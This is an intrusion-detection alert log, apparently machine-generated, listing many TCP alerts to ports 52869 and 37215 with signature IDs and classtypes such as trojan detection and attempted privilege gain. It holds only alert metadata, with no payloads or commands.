                      Timestamp:07/20/24-23:05:59.930873
                      SID:2027339
                      Source Port:49596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.251198
                      SID:2831300
                      Source Port:37786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.628126
                      SID:2027339
                      Source Port:40512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.285003
                      SID:2025132
                      Source Port:54278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.252147
                      SID:2027339
                      Source Port:34226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.773442
                      SID:2829579
                      Source Port:53258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.251823
                      SID:2027339
                      Source Port:53146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:23.916570
                      SID:2831300
                      Source Port:46438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.187333
                      SID:2025132
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542289
                      SID:2831300
                      Source Port:58262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.862638
                      SID:2831300
                      Source Port:38184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.821008
                      SID:2829579
                      Source Port:57520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.176056
                      SID:2025132
                      Source Port:50156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.425707
                      SID:2027339
                      Source Port:34836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2831300
                      Source Port:60872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.833027
                      SID:2835222
                      Source Port:48746
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2829579
                      Source Port:45988
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.884095
                      SID:2027339
                      Source Port:39930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.408714
                      SID:2831300
                      Source Port:35922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.662427
                      SID:2831300
                      Source Port:53360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.474845
                      SID:2027339
                      Source Port:42696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.198650
                      SID:2027339
                      Source Port:39210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2025132
                      Source Port:51432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.627964
                      SID:2027339
                      Source Port:45432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:58670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.896657
                      SID:2027339
                      Source Port:46408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.571514
                      SID:2027339
                      Source Port:49078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.378993
                      SID:2025132
                      Source Port:45306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.195958
                      SID:2025132
                      Source Port:49926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.972369
                      SID:2027339
                      Source Port:45226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.375806
                      SID:2025132
                      Source Port:52630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.640803
                      SID:2027339
                      Source Port:49764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557712
                      SID:2831300
                      Source Port:42068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:50.028546
                      SID:2027339
                      Source Port:33022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.162873
                      SID:2027339
                      Source Port:58188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.444466
                      SID:2831300
                      Source Port:45360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.966438
                      SID:2025132
                      Source Port:54848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.230792
                      SID:2025132
                      Source Port:51684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.880153
                      SID:2027339
                      Source Port:46340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2829579
                      Source Port:47936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.273107
                      SID:2025132
                      Source Port:49548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.432998
                      SID:2027339
                      Source Port:33146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.420371
                      SID:2025132
                      Source Port:55704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2831300
                      Source Port:34980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:22.218849
                      SID:2831300
                      Source Port:59988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.572805
                      SID:2025132
                      Source Port:33554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2025132
                      Source Port:43170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2829579
                      Source Port:44306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.592012
                      SID:2025132
                      Source Port:36532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.417227
                      SID:2025132
                      Source Port:52394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.807504
                      SID:2027339
                      Source Port:42032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.132087
                      SID:2025132
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.273631
                      SID:2025132
                      Source Port:33598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.632555
                      SID:2027339
                      Source Port:52040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.062295
                      SID:2027339
                      Source Port:51174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.268733
                      SID:2027339
                      Source Port:33652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.580139
                      SID:2829579
                      Source Port:52192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.174966
                      SID:2027339
                      Source Port:58288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.697115
                      SID:2025132
                      Source Port:60040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.482858
                      SID:2027339
                      Source Port:56524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2831300
                      Source Port:52566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:49020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.467103
                      SID:2027339
                      Source Port:43800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:32822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.589392
                      SID:2027339
                      Source Port:38836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.344940
                      SID:2025132
                      Source Port:60226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.993408
                      SID:2027339
                      Source Port:59680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.598486
                      SID:2027339
                      Source Port:47600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:56260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.218020
                      SID:2027339
                      Source Port:48372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.018380
                      SID:2835222
                      Source Port:59538
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:34564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2025132
                      Source Port:60212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:55188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.022416
                      SID:2027339
                      Source Port:50004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.339999
                      SID:2835222
                      Source Port:42890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.025383
                      SID:2027339
                      Source Port:47778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.325934
                      SID:2027339
                      Source Port:34694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.800280
                      SID:2025132
                      Source Port:45128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.614128
                      SID:2831300
                      Source Port:34208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.851986
                      SID:2025132
                      Source Port:55550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.535629
                      SID:2027339
                      Source Port:55374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.664572
                      SID:2025132
                      Source Port:45580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:34014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2831300
                      Source Port:37362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.933433
                      SID:2835222
                      Source Port:58516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.686584
                      SID:2027339
                      Source Port:43468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627062
                      SID:2835222
                      Source Port:43206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.263525
                      SID:2025132
                      Source Port:52584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.013470
                      SID:2027339
                      Source Port:58006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2027339
                      Source Port:48220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.876678
                      SID:2025132
                      Source Port:36204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.954404
                      SID:2831300
                      Source Port:59086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2831300
                      Source Port:46224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2027339
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.893722
                      SID:2027339
                      Source Port:43044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.706531
                      SID:2025132
                      Source Port:59420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.927462
                      SID:2025132
                      Source Port:33820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.755424
                      SID:2025132
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2025132
                      Source Port:51926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:19.828184
                      SID:2831300
                      Source Port:59658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:40912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.316062
                      SID:2025132
                      Source Port:34682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.502843
                      SID:2027339
                      Source Port:51910
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.512491
                      SID:2027339
                      Source Port:52940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2835222
                      Source Port:55242
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.399887
                      SID:2025132
                      Source Port:49302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2025132
                      Source Port:37362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.961036
                      SID:2831300
                      Source Port:60430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2835222
                      Source Port:36676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.879451
                      SID:2025132
                      Source Port:34870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.069521
                      SID:2829579
                      Source Port:53810
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2829579
                      Source Port:56990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.467143
                      SID:2027339
                      Source Port:51004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2027339
                      Source Port:37966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2835222
                      Source Port:43602
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.928848
                      SID:2025132
                      Source Port:59406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.258139
                      SID:2027339
                      Source Port:50684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2025132
                      Source Port:54808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.997034
                      SID:2025132
                      Source Port:39212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:10.116912
                      SID:2831300
                      Source Port:51176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.365973
                      SID:2027339
                      Source Port:49388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.631218
                      SID:2027339
                      Source Port:41878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2831300
                      Source Port:57490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:07.975226
                      SID:2025132
                      Source Port:34874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.359487
                      SID:2025132
                      Source Port:52490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:60826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.417957
                      SID:2831300
                      Source Port:49384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.909656
                      SID:2027339
                      Source Port:43898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2829579
                      Source Port:57424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2829579
                      Source Port:58118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.117900
                      SID:2025132
                      Source Port:48204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.641445
                      SID:2831300
                      Source Port:45218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:03.123324
                      SID:2027339
                      Source Port:36960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.376182
                      SID:2027339
                      Source Port:35062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.197388
                      SID:2027339
                      Source Port:50306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.499893
                      SID:2835222
                      Source Port:34912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2027339
                      Source Port:37654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.216845
                      SID:2025132
                      Source Port:48346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:58484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:57346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:49668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:60378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.153687
                      SID:2025132
                      Source Port:44548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:56972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:59528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.027833
                      SID:2025132
                      Source Port:52714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.325929
                      SID:2025132
                      Source Port:42362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2835222
                      Source Port:53544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.924564
                      SID:2027339
                      Source Port:44664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:51874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:33150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.487250
                      SID:2027339
                      Source Port:47354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.450834
                      SID:2025132
                      Source Port:60490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.088639
                      SID:2027339
                      Source Port:57414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.713445
                      SID:2025132
                      Source Port:46276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2835222
                      Source Port:47408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2025132
                      Source Port:38410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.469923
                      SID:2027339
                      Source Port:53502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.826893
                      SID:2027339
                      Source Port:37426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.408822
                      SID:2027339
                      Source Port:54262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.400670
                      SID:2025132
                      Source Port:39694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.513646
                      SID:2025132
                      Source Port:48652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2027339
                      Source Port:57716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.447079
                      SID:2027339
                      Source Port:45262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2027339
                      Source Port:49326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.435068
                      SID:2025132
                      Source Port:51392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.072925
                      SID:2025132
                      Source Port:46322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.589589
                      SID:2831300
                      Source Port:53912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:35948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.454514
                      SID:2025132
                      Source Port:41976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2829579
                      Source Port:35072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2835222
                      Source Port:47014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2831300
                      Source Port:40960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.361554
                      SID:2831300
                      Source Port:41612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:42990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.867753
                      SID:2025132
                      Source Port:39890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2831300
                      Source Port:58408
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2831300
                      Source Port:52168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:40500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
